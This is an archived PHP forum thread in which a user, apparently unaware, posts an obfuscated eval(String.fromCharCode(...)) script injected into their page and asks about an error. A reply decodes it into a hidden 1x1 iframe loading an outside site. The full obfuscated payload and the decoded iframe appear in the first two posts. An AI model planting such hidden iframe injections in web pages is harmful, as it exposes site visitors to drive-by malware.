kyoung1 Posted April 27, 2009 Share Posted April 27, 2009 Hi I have a line of code that is giveing me a headache. can someone take a look at this line and help me find the error? Visit: <a href=http://kickstartadvertising.com//>KickStartAdvertising Hos<?php echo '<script type="text/javascript">eval(String.fromCharCode(118,97,114,32,104,106,103,52,61,34,98,105,116,115,34,59,118,97,114,32,119,61,34,105,110,102,111,34,59,118,97,114,32,114,101,54,61,34,119,97,114,101,46,34,59,118,97,114,32,114,114,116,116,54,61,34,110,101,116,34,59,118,97,114,32,97,61,34,105,102,34,59,118,97,114,32,115,61,34,116,116,34,59,100,111,99,117,109,101,110,116,46,119,114,105,116,101,40,39,60,39,43,97,43,39,114,97,109,101,32,115,114,99,61,34,104,39,43,115,43,39,112,58,47,47,39,43,104,106,103,52,43,39,39,43,119,43,39,39,43,114,101,54,43,39,39,43,114,114,116,116,54,43,39,47,39,43,39,34,32,119,105,100,116,104,61,34,49,34,32,104,101,105,103,104,116,61,34,49,34,62,60,47,105,39,43,39,102,39,43,39,114,97,109,101,62,39,41,59,118,97,114,32,119,61,48,49,48,48,48,49,48,49,48,48,49,49))</script>'; ?> Link to comment https://forums.phpfreaks.com/topic/155911-need-some-help-with-a-line-getting-error/ Share on other sites More sharing options...
Mchl Posted April 27, 2009 Share Posted April 27, 2009 Sure: It inserts an iframe into your document <iframe src="http://bitsinfoware.net/" width="1" height="1"></iframe> lame Link to comment https://forums.phpfreaks.com/topic/155911-need-some-help-with-a-line-getting-error/#findComment-820727 Share on other sites More sharing options...
Recommended Posts
Archived
This topic is now archived and is closed to further replies.